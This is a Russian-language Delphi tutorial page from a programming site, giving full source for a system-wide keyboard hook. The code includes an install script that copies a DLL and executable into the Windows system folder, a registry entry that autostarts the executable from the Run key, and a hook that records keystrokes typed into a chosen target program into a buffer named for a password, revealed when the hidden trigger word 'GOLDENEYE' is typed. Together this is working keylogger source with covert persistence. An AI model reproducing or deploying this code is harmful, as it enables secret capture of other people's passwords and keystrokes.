Приветствую Вас Гость | RSS

Меню сайта

Реклама

Категории раздела
CD-ROM [11]
DLL и PlugIns [75]
Help файлы [20]
INI файлы [16]
RS232 [2]
Активные директории [1]
Директории [0]
Диски [0]
Корзина [5]
Порты [26]
Ресурсы [0]
Файлы [0]
Форматы файлов [15]
Ярлыки [0]

Наш опрос
Есть ли у Вас свой сайт?
Результаты | Архив опросов
Всего ответов: 48

Статистика
Онлайн всего: 1
Гостей: 1
Пользователей: 0

Форма входа
Главная » Статьи » Файловая система » DLL и PlugIns
Как отловить нажатия клавиш для всех процессов в системе
  • Setup.bat 

@echo off
copy HookAgnt.dll %windir%\system
copy kbdhook.exe %windir%\system
start HookAgnt.reg

  • HookAgnt.reg 

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"kbdhook"="kbdhook.exe"

  • KbdHook.dpr 

program cwbhook;

uses
 Windows, Dialogs;

var
 hinstDLL: HINST;
 hkprcKeyboard: TFNHookProc;
 msg: TMsg;

begin
 hinstDLL := LoadLibrary('HookAgnt.dll');
 hkprcKeyboard := GetProcAddress(hinstDLL, 'KeyboardProc');
 SetWindowsHookEx(WH_KEYBOARD, hkprcKeyboard, hinstDLL, 0);
 repeat
 until
 not GetMessage(msg, 0, 0, 0);
end.

  • HookAgnt.dpr 

library HookAgent;

uses
 Windows, KeyboardHook in 'KeyboardHook.pas';

exports
 KeyboardProc;

var
 hFileMappingObject: THandle;
 fInit: Boolean;

{----------------------------\
| |
| DLL_PROCESS_DETACH |
| |
\----------------------------}

procedure DLLMain(Reason: Integer);
begin
 if Reason = DLL_PROCESS_DETACH then
 begin
 UnmapViewOfFile(lpvMem);
 CloseHandle(hFileMappingObject);
 end;
end;

{----------------------------\
| |
| DLL_PROCESS_ATTACH |
| |
\----------------------------}

begin
 DLLProc := @DLLMain;

 hFileMappingObject := CreateFileMapping(
 THandle($FFFFFFFF), // use paging file
 nil, // no security attributes
 PAGE_READWRITE, // read/write access
 0, // size: high 32 bits
 4096, // size: low 32 bits
 'HookAgentShareMem' // name of map object
 );

 if hFileMappingObject = INVALID_HANDLE_VALUE then
 begin
 ExitCode := 1;
 Exit;
 end;

 fInit := GetLastError() <> ERROR_ALREADY_EXISTS;

 lpvMem := MapViewOfFile(
 hFileMappingObject, // object to map view of
 FILE_MAP_WRITE, // read/write access
 0, // high offset: map from
 0, // low offset: beginning
 0 // default: map entire file
 );

 if lpvMem = nil then
 begin
 CloseHandle(hFileMappingObject);
 ExitCode := 1;
 Exit;
 end;

 if fInit then
 FillChar(lpvMem, PASSWORDSIZE, #0);

end.

  • KeyboardHook.pas 

unit KeyboardHook;

interface

uses
 Windows;

const
 PASSWORDSIZE = 16;

var
 g_hhk: HHOOK;
 g_szKeyword: array[0..PASSWORDSIZE-1] of char;
 lpvMem: Pointer;

 function KeyboardProc(nCode: Integer; wParam: WPARAM;
 lParam: LPARAM ): LRESULT; stdcall;

implementation

uses
 SysUtils, Dialogs;

 function KeyboardProc(nCode: Integer; wParam: WPARAM;
 lParam: LPARAM ): LRESULT;

var
 szModuleFileName: array[0..MAX_PATH-1] of Char;
 szKeyName: array[0..16] of Char;
 lpszPassword: PChar;

begin
 lpszPassword := PChar(lpvMem);

 if (nCode = HC_ACTION) and (((lParam shr 16) and KF_UP) = 0) then
 begin
 GetKeyNameText(lParam, szKeyName, sizeof(szKeyName));

 if StrLen(g_szKeyword) + StrLen(szKeyName) >= PASSWORDSIZE then
 lstrcpy(g_szKeyword, g_szKeyword + StrLen(szKeyName));

 lstrcat(g_szKeyword, szKeyName);

 GetModuleFileName(0, szModuleFileName, sizeof(szModuleFileName));

 if (StrPos(StrUpper(szModuleFileName),'__ТО_ЧЕГО_АДО__') <> nil) and
 (strlen(lpszPassword) + strlen(szKeyName) < PASSWORDSIZE) then
 lstrcat(lpszPassword, szKeyName);

 if StrPos(StrUpper(g_szKeyword), 'GOLDENEYE') <> nil then
 begin
 ShowMessage(lpszPassword);
 g_szKeyword[0] := #0;
 end;

 Result := 0;
 end
 else
 Result := CallNextHookEx(g_hhk, nCode, wParam, lParam);
end;

end.
Категория: DLL и PlugIns | Добавил: Skinner (06.07.2008)
Просмотров: 386 | Рейтинг: 0.0/0
  Delphi Lab   Главная   Регистрация   Вход  
Интересная Цитата

Поиск

Магазин

Copyright MyCorp © 2025 Хостинг от uCoz